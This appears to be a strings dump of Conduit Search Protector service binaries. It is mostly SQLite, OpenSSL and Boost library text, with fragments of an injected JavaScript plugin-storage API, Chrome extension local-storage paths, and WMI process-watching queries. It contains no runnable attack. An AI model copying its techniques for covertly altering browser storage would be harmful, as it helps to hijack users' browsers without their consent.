%s USING %s%sINDEX%s%s%s
%s USING INTEGER PRIMARY KEY
%s (rowid>?)
%s (rowid)
%s (rowid=?)
%s (rowid>? AND rowid)
at most %d tables in a join
cannot use index: %s
%s VIRTUAL TABLE INDEX %d:%s
%s (~%lld rows)
the NOT INDEXED clause is not allowed on UPDATE or DELETE statements within triggers
the INDEXED BY clause is not allowed on UPDATE or DELETE statements within triggers
SQL logic error or missing database
unknown operation
large file support is disabled
unknown database: %s
no such %s mode: %s
%s mode not allowed: %s
no such vfs: %s
cannot open file at line %d of [%.10s]
database corruption at line %d of [%.10s]
misuse at line %d of [%.10s]
C:\Builds\113\Search Protector\SP-2.16.10-Production\Sources\SearchProtector\Dev\2.16.10\Output\Release_32\CltMngSvc.pdb
WTSAPI32.dll
USERENV.dll
KERNEL32.dll
USER32.dll
ReportEventW
ADVAPI32.dll
SHELL32.dll
ole32.dll
OLEAUT32.dll
I_RpcBindingInqTransportType
RPCRT4.dll
PSAPI.DLL
VERSION.dll
HttpOpenRequestA
HttpAddRequestHeadersA
HttpSendRequestW
HttpSendRequestA
HttpSendRequestExW
HttpEndRequestW
HttpQueryInfoA
WININET.dll
CryptMsgClose
CertGetNameStringW
CertFreeCertificateContext
CertFindCertificateInStore
CertCloseStore
CryptMsgGetParam
CRYPT32.dll
dbghelp.dll
GetCPInfo
RegCloseKey
RegOpenKeyExW
RegDeleteKeyW
RegEnumKeyExW
RegCreateKeyExW
RegNotifyChangeKeyValue
ReportEventA
C:\PROGRA~1\SearchProtect\
ws.api = ws.api || {};ws.api.FunctionsEnum = {SET_KEY: 1,
GET_KEY: 2,
REMOVE_KEY: 3,
ws.api.StatusEnum = {SP_RESULT_KEY_DOES_NOT_EXIST: -2,
ws.api.RESULT_TIMOUET = 3000;
ws.api.storage = ws.api.storage || {};ws.api.storage.setKey =
function (pluginId, key, value, callback, options) {if (typeof (pluginId) !== 'string' || pluginId === "" || typeof (key) !== 'string' || key === "" || typeof (callback) !== 'function') {callback(ws.api.StatusEnum.SP_RESULT_INVALID_PARAMS);
// Construct an object which will be passed to the VC holding all the parameters
data.funcId = ws.api.FunctionsEnum.SET_KEY;
data.pluginId = pluginId;
data.key = key;
data.value = value;
data.options = options; // Currently not used - this is for future use, if we will want to add more parameters we will
var resultObj = JSON.parse(result);
callback(resultObj.status);
callback(ws.api.StatusEnum.SP_RESULT_SP_UNRESPONSIVE);
}, ws.api.RESULT_TIMOUET);
ws.internal.SendStringToVC(JSON.stringify(data), myCallback);
ws.api.storage.getKey =
function (pluginId, key, callback, options) {data.funcId = ws.api.FunctionsEnum.GET_KEY;
var value = resultObj.value;
if (resultObj.status != ws.api.StatusEnum.SP_RESULT_SUCCESS) {callback(resultObj.status, value);
callback(ws.api.StatusEnum.SP_RESULT_SP_UNRESPONSIVE, "");
ws.api.storage.removeKey =
data.funcId = ws.api.FunctionsEnum.REMOVE_KEY;
ws.api.system = ws.api.system || {};ws.api.system.remove =
data.funcId = ws.api.FunctionsEnum.REMOVE;
data.shouldCallUninstaller = shouldCallUninstaller;
ws.internal = ws.internal || {};if (ws.internal.injectedSP_PLUGIN_ID_SP_TASK_ID === undefined) {ws.internal.injectedSP_PLUGIN_ID_SP_TASK_ID = true;
hmscoree.dll
Vkernel32.dll
combase.dll
- floating point support not loaded
- CRT not initialized
- Attempt to initialize the CRT more than once.
portuguese-brazilian
8.0.0.0-11.999.999.999
33.0.0.0-36.999.999.999
16.0.0.0-31.999.999.999
Failed to execute installer :
SPSetup.exe
%s (Error: %d)
{{{SP#Conduit::SearchProtector::Service::ServiceBase::ReportEventW#SP}}}*.dmp
WindowsSessionManagerThread
2.16.10.61
UIRepository.dat
UserRepository.dat
SystemRepository.dat
36.0.0.0
Failed to set Url
chrome-extension_
_0.localstorage
32.0.0.0
HKEY_LOCAL_MACHINE
HKEY_CURRENT_USER
HKEY_CLASSES_ROOT
HKEY_PERFORMANCE_NLSTEXT
HKEY_PERFORMANCE_TEXT
HKEY_PERFORMANCE_DATA
HKEY_USERS
HKEY_DYN_DATA
HKEY_CURRENT_USER_LOCAL_SETTINGS
HKEY_CURRENT_CONFIG
user32.dll
ieframe.dll
Windows Server 2008
Windows 7
Windows Vista
Windows 8.1
Windows Server 2012
Windows 8
Windows Server 2008 R2
%x %x[%s] %I64x %x %x
SELECT * FROM __InstanceCreationEvent WITHIN %1% WHERE TargetInstance ISA 'Win32_Process' And TargetInstance.Name = '%2%'
SELECT * FROM __InstanceDeletionEvent WITHIN %1% WHERE TargetInstance ISA 'Win32_Process' And TargetInstance.Name = '%2%'
yntdll.dll
%s%s%s
Correct password required
{{{SP#Conduit::SearchProtector::Utils::WMIAgentJob::Join#SP}}}
HIDispatch error #%d
IWindowsSessionManagerException
01234567
RpcTransportException
N8.0.0.0-11.999.999.999
Kernel32.dll
C:\PROGRA~1\SearchProtect\Main\bin\CltMngSvc.exe
cltmng.exe_996:
.text
`.rdata
@.data
.rsrc
@.reloc
DlSHA512 block transform for x86, CRYPTOGAMS by
Camellia for x86 by
AES for Intel AES-NI, CRYPTOGAMS by
AES for x86, CRYPTOGAMS by
RC4 for x86, CRYPTOGAMS by
Montgomery Multiplication for x86, CRYPTOGAMS by
SHA1 block transform for x86, CRYPTOGAMS by
SHA256 block transform for x86, CRYPTOGAMS by
GHASH for x86, CRYPTOGAMS by
GF(2^m) Multiplication for x86, CRYPTOGAMS by
broken pipe
inappropriate io control operation
not supported
operation in progress
operation not permitted
operation not supported
operation would block
protocol not supported
function not supported
operation canceled
address_family_not_supported
operation_in_progress
operation_not_supported
protocol_not_supported
operation_would_block
address family not supported
0123456789-
%b %d %H : %M : %S %Y
%m / %d / %y
%I : %M : %S %p
%d / %m / %y
kernel32.dll
boost::filesystem::directory_iterator::operator
The repeat operator "*" cannot start a regular expression.
The repeat operator "?" cannot start a regular expression.
The repeat operator " " cannot start a regular expression.
Found a closing repetition operator } with no corresponding {.Can't terminate a sub-expression with an alternation operator |.
The \c and \C escape sequences are not supported by POSIX basic regular expressions: try the Perl syntax instead.
A regular expression can start with the alternation operator |.
Invalid alternation operators within (?...) block.
More than one alternation operator | was encountered inside a conditional expression.
Alternation operators are not allowed inside a DEFINE block.
A repetition operator cannot be applied to a zero-width assertion.
left-curly-bracket
right-curly-bracket
0123456789
Unmatched quantified repeat operator { or \{.Invalid preceding regular expression prior to repetition operator.
boost thread: trying joining itself
Local\{C15730E2-145C-4c5e-B005-3BC753F42475}-once-flagVisual C CRT: Not enough memory to complete call to strerror.
Operation not permitted
Inappropriate I/O control operation
Broken pipe
operator
GetProcessWindowStation
CERTIFICATE REQUEST
NEW CERTIFICATE REQUEST
CERTIFICATE
PUBLIC KEY
RSA part of OpenSSL 1.0.1e 11 Feb 2013
SHA-512 part of OpenSSL 1.0.1e 11 Feb 2013
ssl_sess_cert
ssl_cert
evp_pkey
x509_pkey
%s(%d): OpenSSL internal error, assertion failed: %s
passed a null parameter
DSO support routines
x509 certificate routines
error:lX:%s:%s:%s
Big Number part of OpenSSL 1.0.1e 11 Feb 2013
pubkey
PEM part of OpenSSL 1.0.1e 11 Feb 2013
phrase is too short, needs to be at least %d chars
Enter PEM pass phrase:
TRUSTED CERTIFICATE
X509 CERTIFICATE
PRIVATE KEY
ENCRYPTED PRIVATE KEY
ANY PRIVATE KEY
enc_key
key_enc_algor
cert
d.encrypted
d.digest
d.signed_and_enveloped
d.enveloped
d.sign
d.data
d.other
NETSCAPE_CERT_SEQUENCE
certs
X509_PUBKEY
public_key
.\crypto\asn1\x_pubkey.c
DSA part of OpenSSL 1.0.1e 11 Feb 2013
priv_key
pub_key
.\crypto\ec\ec_key.c
EC_PRIVATEKEY
publicKey
privateKey
value.implicitlyCA
value.parameters
value.named_curve
p.char_two
p.prime
p.ppBasis
p.tpBasis
p.onBasis
p.other
Any Extended Key Usage
anyExtendedKeyUsage
supportedAlgorithms
crossCertificatePair
certificateRevocationList
cACertificate
userCertificate
userPassword
supportedApplicationContext
Microsoft Local Key set
LocalKeySet
id-Gost28147-89-None-KeyMeshing
id-Gost28147-89-CryptoPro-KeyMeshing
password based MAC
id-PasswordBasedMAC
X509v3 Certificate Issuer
certificateIssuer
certicom-arc
Proxy Certificate Information
proxyCertInfo
Microsoft Smartcardlogin
msSmartcardLogin
joint-iso-itu-t
JOINT-ISO-ITU-T
set-rootKeyThumb
setAttr-Cert
setCext-cCertRequired
setCext-certType
setct-CertResTBE
setct-CertReqTBEX
setct-CertReqTBE
setct-AcqCardCodeMsgTBE
setct-CertInqReqTBS
setct-CertResData
setct-CertReqTBS
setct-CertReqData
setct-PCertResTBS
setct-PCertReqData
setct-AcqCardCodeMsg
certificate extensions
set-certExt
set-msgExt
id-ecPublicKey
id-cmc-confirmCertAcceptance
id-cmc-getCert
id-regInfo-certReq
id-regCtrl-protocolEncrKey
id-regCtrl-oldCertID
id-it-revPassphrase
id-it-keyPairParamRep
id-it-keyPairParamReq
id-it-unsupportedOIDs
id-it-caKeyUpdateInfo
id-it-encKeyPairTypes
id-it-signKeyPairTypes
id-it-caProtEncCert
id-mod-attribute-cert
id-mod-qualified-cert-93
id-mod-qualified-cert-88
id-smime-aa-ets-certCRLTimestamp
id-smime-aa-ets-certValues
id-smime-aa-ets-CertificateRefs
id-smime-aa-ets-otherSigCert
id-smime-aa-smimeEncryptCerts
id-smime-aa-signingCertificate
id-smime-aa-encrypKeyPref
id-smime-aa-msgSigDigest
id-smime-ct-publishCert
id-smime-mod-msg-v3
sdsiCertificate
x509Certificate
localKeyID
certBag
pkcs8ShroudedKeyBag
keyBag
pbeWithSHA1And2-KeyTripleDES-CBC
pbeWithSHA1And3-KeyTripleDES-CBC
TLS Web Client Authentication
TLS Web Server Authentication
X509v3 Extended Key Usage
extendedKeyUsage
X509v3 Authority Key Identifier
authorityKeyIdentifier
X509v3 Certificate Policies
certificatePolicies
X509v3 Private Key Usage Period
privateKeyUsagePeriod
X509v3 Key Usage
keyUsage
X509v3 Subject Key Identifier
subjectKeyIdentifier
Netscape Certificate Sequence
nsCertSequence
Netscape CA Policy Url
nsCaPolicyUrl
Netscape Renewal Url
nsRenewalUrl
Netscape CA Revocation Url
nsCaRevocationUrl
Netscape Revocation Url
nsRevocationUrl
Netscape Base Url
nsBaseUrl
Netscape Cert Type
nsCertType
Netscape Certificate Extension
nsCertExt
extendedCertificateAttributes
challengePassword
dhKeyAgreement
RAND part of OpenSSL 1.0.1e 11 Feb 2013
You need to read the OpenSSL FAQ, http://www.openssl.org/support/faq.html
lhash part of OpenSSL 1.0.1e 11 Feb 2013
Stack part of OpenSSL 1.0.1e 11 Feb 2013
Diffie-Hellman part of OpenSSL 1.0.1e 11 Feb 2013
value.single
value.set
.\crypto\evp\evp_key.c
nkey <= EVP_MAX_KEY_LENGTH
EVP part of OpenSSL 1.0.1e 11 Feb 2013
name.relativename
name.fullname
certificateHold
Certificate Hold
cessationOfOperation
Cessation Of Operation
keyCompromise
Key Compromise
%*s%s:
%*sOnly Attribute Certificates
%*sOnly CA Certificates
%*sOnly User Certificates
ASN.1 part of OpenSSL 1.0.1e 11 Feb 2013
d.registeredID
d.iPAddress
d.uniformResourceIdentifier
d.ediPartyName
d.directoryName
d.dNSName
d.rfc822Name
d.otherName
AUTHORITY_KEYID
keyid
cert_info
PKCS8_PRIV_KEY_INFO
pkey
pkeyalg
EC part of OpenSSL 1.0.1e 11 Feb 2013
USER32.DLL
NETAPI32.DLL
KERNEL32.DLL
ADVAPI32.DLL
.\crypto\dh\dh_key.c
%s: (%d bit)
Public-Key
Private-Key
recommended-private-length: %d bits
public-key:
private-key:
PKCS#3 DH Public-Key
PKCS#3 DH Private-Key
Public-Key: (%d bit)
Private-Key: (%d bit)
SHA1 part of OpenSSL 1.0.1e 11 Feb 2013
SHA-256 part of OpenSSL 1.0.1e 11 Feb 2013
RIPE-MD160 part of OpenSSL 1.0.1e 11 Feb 2013
SHA part of OpenSSL 1.0.1e 11 Feb 2013
MD5 part of OpenSSL 1.0.1e 11 Feb 2013
MD4 part of OpenSSL 1.0.1e 11 Feb 2013
AES part of OpenSSL 1.0.1e 11 Feb 2013
CAST part of OpenSSL 1.0.1e 11 Feb 2013
Blowfish part of OpenSSL 1.0.1e 11 Feb 2013
:RC2 part of OpenSSL 1.0.1e 11 Feb 2013
IDEA part of OpenSSL 1.0.1e 11 Feb 2013
libdes part of OpenSSL 1.0.1e 11 Feb 2013
DES part of OpenSSL 1.0.1e 11 Feb 2013
%d.%d.%d.%d
IP Address:%d.%d.%d.%d
URI:%s
DNS:%s
email:%s
EdiPartyName:
X400Name:
othername:
%d.%d.%d.%d/%d.%d.%d.%d
X509_CERT_PAIR
X509_CERT_AUX
X.509 part of OpenSSL 1.0.1e 11 Feb 2013
x%s
%s - d:d:d%.*s %d%s
keylen <= sizeof key
EVP_CIPHER_key_length(cipher) <= (int)sizeof(md_tmp)
ECDSA part of OpenSSL 1.0.1e 11 Feb 2013
Basis Type: %s
Field Type: %s
ASN1 OID: %s
%s %s%lu (%s0x%lx)
'() ,-./:=?
%lu:%s:%s:%d:%s
Verifying - %s
%*sPolicy Text: %s
%*scrlUrl:
EXTENDED_KEY_USAGE
%*sZone: %s, User:
.\crypto\x509v3\v3_akey.c
d.usernotice
d.cpsuri
CERTIFICATEPOLICIES
%*sExplicit Text: %s
%*sNumber%s:
%*sOrganization: %s
%*sCPS: %s
PKEY_USAGE_PERIOD
keyCertSign
Certificate Sign
keyAgreement
Key Agreement
keyEncipherment
Key Encipherment
.\crypto\x509v3\v3_skey.c
CONF part of OpenSSL 1.0.1e 11 Feb 2013
PROXY_CERT_INFO_EXTENSION
hexkey
rsa_keygen_pubexp
rsa_keygen_bits
keylength
keyfunc
len>=0 && len<=(int)sizeof(ctx->key)
j <= (int)sizeof(ctx->key)
.\crypto\pkcs12\p12_key.c
d.receiptList
d.allOrFirstTier
d.compressedData
d.authenticatedData
d.encryptedData
d.digestedData
d.envelopedData
d.signedData
d.ori
d.pwri
d.kekri
d.kari
d.ktri
CMS_PasswordRecipientInfo
keyDerivationAlgorithm
keyIdentifier
CMS_KeyAgreeRecipientInfo
recipientEncryptedKeys
CMS_OriginatorIdentifierOrKey
d.originatorKey
CMS_OriginatorPublicKey
CMS_RecipientEncryptedKey
CMS_KeyAgreeRecipientIdentifier
d.rKeyId
CMS_RecipientKeyIdentifier
CMS_OtherKeyAttribute
keyAttr
keyAttrId
CMS_KeyTransRecipientInfo
encryptedKey
keyEncryptionAlgorithm
certificates
d.crl
d.subjectKeyIdentifier
d.issuerAndSerialNumber
CMS_CertificateChoices
d.v2AttrCert
d.v1AttrCert
d.extendedCertificate
d.certificate
CMS_OtherCertificateFormat
otherCert
otherCertFormat
crlUrl
certStatus
certId
OCSP_CERTSTATUS
value.unknown
value.revoked
value.good
value.byKey
value.byName
reqCert
OCSP_CERTID
issuerKeyHash
CONF_def part of OpenSSL 1.0.1e 11 Feb 2013
[[%s]]
[%s] %s=%s
ECDH part of OpenSSL 1.0.1e 11 Feb 2013
value.bag
value.safes
value.shkeybag
value.keybag
value.sdsicert
value.x509cert
value.other
%s.dll
C:\Builds\113\Search Protector\SP-2.16.10-Production\Sources\3rdParty\Boost\boost_1_55_0\boost/exception/detail/exception_ptr.hpp
CREATE TABLE ItemTable (key TEXT UNIQUE ON CONFLICT REPLACE, value TEXT NOT NULL ON CONFLICT FAIL);
insert into ItemTable (key, value) VALUES ('%s', '%s');
\StringFileInfo\xx\%s
(more frames truncated from call stack report)
Module %d
%d/%d/%d d:d:d
Image Base: 0xx Image Size: 0xx
File Size: %-10d File Time: %s
Checksum: 0xx Time Stamp: 0xx
Company: %s
FileDesc: %s
Product: %s
ProdVer: %d.%d.%d.%d
FileVer: %d.%d.%d.%d
Windows Server 2008
Windows Vista
Windows 7
Windows Server 2008 R2
Windows 8
Windows 9
Windows Server 2012
Web Edition
Windows Server 9
Windows XP
Windows 2000
(build %d)
This sample does not support this version of Windows.
Error occurred at %s.
Operating system: %s
%d processor(s), type %d.
Operating system: Could not Determine
%d%% memory in use.
%d MBytes paging file.
%d MBytes physical memory free.
%d MBytes user address space free.
%d MBytes user address space.
Web Server Edition
Windows Storage Server 2003
Windows Server 2003 R2
Windows XP Professional x64 Edition
Windows Home Server
Windows Server 2003
a Float Denormal Operand
%d MBytes paging file free.
a Float Invalid Operation
%d MBytes physical memory.
0xx:
EDI: 0xx ESI: 0xx EAX: 0xx
EIP: 0xx EBP: 0xx SegCs: 0xx
EBX: 0xx ECX: 0xx EDX: 0xx
%s\CRASH_REPORT_%s.txt
EFlags: 0xx ESP: 0xx SegSs: 0xx
%s caused %s (0xx)
in module %s at x:x.
%s location x caused an access violation.
%s\CRASH_DUMP_%s.dmp
===== [end of %s] =====
Error creating dump file, err=%d
Exception code is 0xX
Crash dump file: %s
Crash report file :%s
P%d_T%d_Dld_ld_ld_Tld_ld_ld
code: %x
code: %x, addr: %x, module: %s
C:\Builds\113\Search Protector\SP-2.16.10-Production\Sources\3rdParty\google\gtest\gtest-1.6.0\include\gtest/internal/gtest-port.h
NtQueryKey
%s 0x%I64x %s [file:%s(%u)]
https://
ftp://
http://
[%u, 0xx] %s
wininet.dll
https
HTTP/1.0
Content-Type: application/x-www-form-urlencoded
request HttpSendRequestA failed...
Content-Length: %u
response failed...last error %d
spx.params
spx.assets
SQLite format 3
REINDEXEDESCAPEACHECKEYBEFOREIGNOREGEXPLAINSTEADDATABASELECTABLEFTHENDEFERRABLELSEXCEPTRANSACTIONATURALTERAISEXCLUSIVEXISTSAVEPOINTERSECTRIGGEREFERENCESCONSTRAINTOFFSETEMPORARYUNIQUERYATTACHAVINGROUPDATEBEGINNERELEASEBETWEENOTNULLIKECASCADELETECASECOLLATECREATECURRENT_DATEDETACHIMMEDIATEJOINSERTMATCHPLANALYZEPRAGMABORTVALUESVIRTUALIMITWHENWHERENAMEAFTEREPLACEANDEFAULTAUTOINCREMENTCASTCOLUMNCOMMITCONFLICTCROSSCURRENT_TIMESTAMPRIMARYDEFERREDISTINCTDROPFAILFROMFULLGLOBYIFISNULLORDERESTRICTOUTERIGHTROLLBACKROWUNIONUSINGVACUUMVIEWINITIALLY
CREATE TABLE sqlite_master(
sql text
3.7.16
CREATE TEMP TABLE sqlite_temp_master(
00:00:00.
1.1.3
gen_codes: max_code %d
code %d bits %d->%d
bl code -
last_lit %u, last_dist %u, in %ld, out ~%ld(%ld%%)
opt %lu(%lu) stat %lu(%lu) stored %lu lit %u dist %u
boost::too_many_args: format-string referred to less arguments than were passed
boost::too_few_args: format-string referred to more arguments than were passed
Union operator has to be applied to node sets
Content-Disposition: form-data; name="%s"
Content-Disposition: form-data; name="%s"; filename="%s"
Conduit::SearchProtector::Utils::Singleton::GetInstance
invalid map key
%s[%d]: %s
SQLITE_OK
SQLITE_INTERNAL
SQLITE_ERROR
SQLITE_ABORT
SQLITE_PERM
SQLITE_LOCKED
SQLITE_BUSY
SQLITE_READONLY
SQLITE_NOMEM
SQLITE_IOERR
SQLITE_INTERRUPT
SQLITE_NOTFOUND
SQLITE_CORRUPT
SQLITE_CANTOPEN
SQLITE_FULL
SQLITE_EMPTY
SQLITE_PROTOCOL
SQLITE_TOOBIG
SQLITE_SCHEMA
SQLITE_MISMATCH
SQLITE_CONSTRAINT
SQLITE_NOLFS
SQLITE_MISUSE
SQLITE_FORMAT
SQLITE_AUTH
SQLITE_ROW
SQLITE_RANGE
CPPSQLITE_ERROR
SQLITE_DONE
SQLITE_
d:d:d
d-d-d d:d:d
d-d-d
failed to allocate %u bytes of memory
failed memory resize %u to %u bytes
API call with %s database connection pointer
922337203685477580
RowKey
GetProcessHeap
OsError 0x%x (%u)
delayed %dms for lock/sharing conflict
os_win.c:%d: (%d) %s(%s) - %s
%s-shm
%s\etilqs_
%s\%s
Recovered %d frames from WAL file %s
cannot limit WAL size: %s
2nd reference to page %d
invalid page number %d
Bad ptr map entry key=%d expected=(%d,%d) got=(%d,%d)
Failed to read ptrmap key=%d
failed to get page %d
%d of %d pages missing from overflow list starting at %d
Page %d:
freelist leaf count too big on page %d
btreeInitPage() returns error code %d
unable to get the page. error code=%d
On tree page %d cell %d:
On page %d at right child:
Multiple uses for byte %d of page %d
Corruption detected in cell %d on page %d
Fragmentation of %d bytes reported as %d on page %d
Page %d is never used
Outstanding page count goes from %d to %d during this analysis
Pointer map page %d is referenced
unknown database %s
keyinfo(%d
%s(%d)
MJ delete: %s
%s-mjXXXXXX9XXz
-mjX9X
MJ collide: %s
foreign key constraint failed
bind on a busy prepared statement: [%s]
unable to use function %s in the requested context
zeroblob(%d)
constraint failed at %d in [%s]
abort at %d in [%s]: %s
no such savepoint: %s
cannot open savepoint - SQL statements in progress
cannot commit transaction - SQL statements in progress
cannot release savepoint - SQL statements in progress
sqlite_master
sqlite_temp_master
SELECT name, rootpage, sql FROM '%q'.%s WHERE %s ORDER BY rowid
database table is locked: %s
cannot change %s wal mode from within a transaction
statement aborts at %d: [%s] %s
cannot open value of type %s
cannot open view: %s
cannot open virtual table: %s
foreign key
no such column: "%s"
cannot open %s column for writing
indexed
misuse of aliased aggregate %s
%s: %s.%s.%s
%s: %s
%s: %s.%s
not authorized to use function: %s
%r %s BY term out of range - should be between 1 and %d
too many terms in %s BY clause
variable number must be between ?1 and ?%d
Expression tree is too large (maximum depth %d)
too many columns in %s
too many SQL variables
misuse of aggregate: %s()
EXECUTE %s%s SUBQUERY %d
%s%.*s"%w"
%.*s"%w"%s
sqlite_rename_trigger
sqlite_rename_table
sqlite_rename_parent
type='trigger' AND (%s)
%s OR name=%Q
sqlite_
there is already another table or index with this name: %s
table %s may not be altered
UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
view %s may not be altered
sqlite_sequence
UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d 18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
UPDATE "%w".sqlite_sequence set name = %Q WHERE name = %Q
Cannot add a PRIMARY KEY column
UPDATE "%w".%s SET sql = substr(sql,1,%d) || ', ' || %Q || substr(sql,%d) WHERE type = 'table' AND name = %Q
sqlite_stat1
sqlite_altertab_%s
CREATE TABLE %Q.%s(%s)
DELETE FROM %Q.%s WHERE %s=%Q
invalid name: "%s"
SELECT tbl,idx,stat FROM %Q.sqlite_stat1
too many attached databases - max %d
database %s is already in use
unable to open database: %s
cannot detach database %s
no such database: %s
database %s is locked
sqlite_attach
sqlite_detach
%s %T cannot reference objects in database %s
access to %s.%s is prohibited
access to %s.%s.%s is prohibited
object name reserved for internal use: %s
too many columns on %s
there is already an index named %s
default value of column [%s] is not constant
duplicate column name: %s
table "%s" has more than one primary key
AUTOINCREMENT is only allowed on an INTEGER PRIMARY KEY
CREATE %s %.*s
CREATE TABLE %Q.sqlite_sequence(name,seq)
UPDATE %Q.%s SET type='%s', name=%Q, tbl_name=%Q, rootpage=#%d, sql=%Q WHERE rowid=#%d
UPDATE %Q.%s SET rootpage=%d WHERE #%d AND rootpage=#%d
view %s is circularly defined
DELETE FROM %Q.sqlite_sequence WHERE name=%Q
sqlite_stat%d
sqlite_stat
DELETE FROM %Q.%s WHERE tbl_name=%Q and type!='trigger'
use DROP TABLE to delete table %s
table %s may not be dropped
foreign key on %s should reference only one column of table %T
use DROP VIEW to delete view %s
unknown column "%s" in foreign key definition
number of columns in foreign key does not match the number of columns in the referenced table
indexed columns are not unique
table %s may not be indexed
virtual tables may not be indexed
views may not be indexed
index %s already exists
there is already a table named %s
table %s has no column named %s
sqlite_autoindex_%s_%d
CREATE%s INDEX %.*s
INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);index associated with UNIQUE or PRIMARY KEY constraint cannot be dropped
no such index: %S
DELETE FROM %Q.%s WHERE name=%Q AND type='index'
a JOIN clause is required before %s
unable to identify the object to be reindexed
table %s may not be modified
no such collation sequence: %s
cannot modify %s because it is a view
sqlite_version
sqlite_log
sqlite_source_id
sqlite_compileoption_get
sqlite_compileoption_used
foreign key mismatch - "%w" referencing "%w"
%d values for %d columns
table %S has %d columns but %d values were supplied
table %S has no column named %s
constraint %s failed
%s.%s may not be NULL
PRIMARY KEY must be unique
unable to open shared library [%s]
sqlite3_extension_init
error during initialization: %s
no entry point [%s] in shared library [%s]
automatic extension loading failed: %s
foreign_keys
foreign_key_list
foreign_key_check
*** in database %s ***
unsupported encoding: %s
%s - %s
malformed database schema (%s)
unsupported file format
database schema is locked: %s
SELECT name, rootpage, sql FROM '%q'.%s ORDER BY rowid
RIGHT and FULL OUTER JOINs are not currently supported
unknown or unsupported join type: %T %T%s%T
cannot have both ON and USING clauses in the same join
a NATURAL join may not have an ON or USING clause
cannot join using column %s - column not present in both tables
USE TEMP B-TREE FOR %s
%s.%s
COMPOUND SUBQUERIES %d AND %d %s(%s)
ORDER BY clause should come after %s not before
%s:%d
LIMIT clause should come after %s not before
no such index: %s
SELECTs to the left and right of %s do not have the same number of result columns
too many references to "%s": max 65535
sqlite_subquery_%p_
no such table: %s
%s.%s.%s
SCAN TABLE %s %s%s(~%d rows)
sqlite3_get_table() called with two or more incompatible queries
cannot create %s trigger on view: %S
INSERT INTO %Q.%s VALUES('trigger',%Q,%Q,0,'CREATE TRIGGER %q')cannot create INSTEAD OF trigger on table: %S
no such trigger: %S
no such column: %s
-- TRIGGER %s
cannot VACUUM - SQL statements in progress
PRAGMA vacuum_db.synchronous=OFF
SELECT 'CREATE INDEX vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE sql LIKE 'CREATE INDEX %'
SELECT 'CREATE TABLE vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE type='table' AND name!='sqlite_sequence' AND rootpage>0
SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
SELECT 'CREATE UNIQUE INDEX vacuum_db.' || substr(sql,21) FROM sqlite_master WHERE sql LIKE 'CREATE UNIQUE INDEX %'
SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
INSERT INTO vacuum_db.sqlite_master SELECT type, name, tbl_name, rootpage, sql FROM main.sqlite_master WHERE type='view' OR type='trigger' OR (type='table' AND rootpage=0)
UPDATE %Q.%s SET type='table', name=%Q, tbl_name=%Q, rootpage=0, sql=%Q WHERE rowid=#%d
vtable constructor did not declare schema: %s
vtable constructor failed: %s
no such module: %s
table %s: xBestIndex returned an invalid plan
%s TABLE %s
%s SUBQUERY %d
%s AS %s
%s USING %s%sINDEX%s%s%s
%s (rowid=?)
%s USING INTEGER PRIMARY KEY
%s (rowid>?)
%s (rowid>? AND rowid)
%s VIRTUAL TABLE INDEX %d:%s
%s (rowid)
at most %d tables in a join
%s (~%lld rows)
cannot use index: %s
the NOT INDEXED clause is not allowed on UPDATE or DELETE statements within triggers
the INDEXED BY clause is not allowed on UPDATE or DELETE statements within triggers
SQL logic error or missing database
unknown operation
large file support is disabled
unknown database: %s
%s mode not allowed: %s
no such %s mode: %s
no such vfs: %s
database corruption at line %d of [%.10s]
cannot open file at line %d of [%.10s]
misuse at line %d of [%.10s]
{{{$703}}}{{{$704}}}{{{$705}}}{{{$137}}}C:\Builds\113\Search Protector\SP-2.16.10-Production\Sources\SearchProtector\Dev\2.16.10\Output\Release_32\cltmng.pdb
KERNEL32.dll
MsgWaitForMultipleObjects
USER32.dll
VERSION.dll
PSAPI.DLL
InternetCrackUrlW
HttpOpenRequestA
HttpAddRequestHeadersA
HttpSendRequestW
HttpSendRequestA
HttpSendRequestExW
HttpEndRequestW
HttpQueryInfoA
WININET.dll
dbghelp.dll
CryptMsgClose
CertGetNameStringW
CertFreeCertificateContext
CertFindCertificateInStore
CertCloseStore
CryptMsgGetParam
CRYPT32.dll
UrlUnescapeW
SHLWAPI.dll
CreateIoCompletionPort
GetCPInfo
RegCloseKey
RegOpenKeyExW
RegDeleteKeyW
RegEnumKeyExW
RegCreateKeyExW
RegQueryInfoKeyW
RegNotifyChangeKeyValue
ADVAPI32.dll
ShellExecuteExW
SHELL32.dll
ole32.dll
OLEAUT32.dll
ReportEventA
I_RpcBindingInqTransportType
RPCRT4.dll
%Documents and Settings%\%current user%\Local Settings\Application Data\SearchProtect\SearchProtect
ws.api = ws.api || {};ws.api.FunctionsEnum = {SET_KEY: 1,
GET_KEY: 2,
REMOVE_KEY: 3,
ws.api.StatusEnum = {SP_RESULT_KEY_DOES_NOT_EXIST: -2,
ws.api.RESULT_TIMOUET = 3000;
ws.api.storage = ws.api.storage || {};ws.api.storage.setKey =
function (pluginId, key, value, callback, options) {if (typeof (pluginId) !== 'string' || pluginId === "" || typeof (key) !== 'string' || key === "" || typeof (callback) !== 'function') {callback(ws.api.StatusEnum.SP_RESULT_INVALID_PARAMS);
// Construct an object which will be passed to the VC holding all the parameters
data.funcId = ws.api.FunctionsEnum.SET_KEY;
data.pluginId = pluginId;
data.key = key;
data.value = value;
data.options = options; // Currently not used - this is for future use, if we will want to add more parameters we will
var resultObj = JSON.parse(result);
callback(resultObj.status);
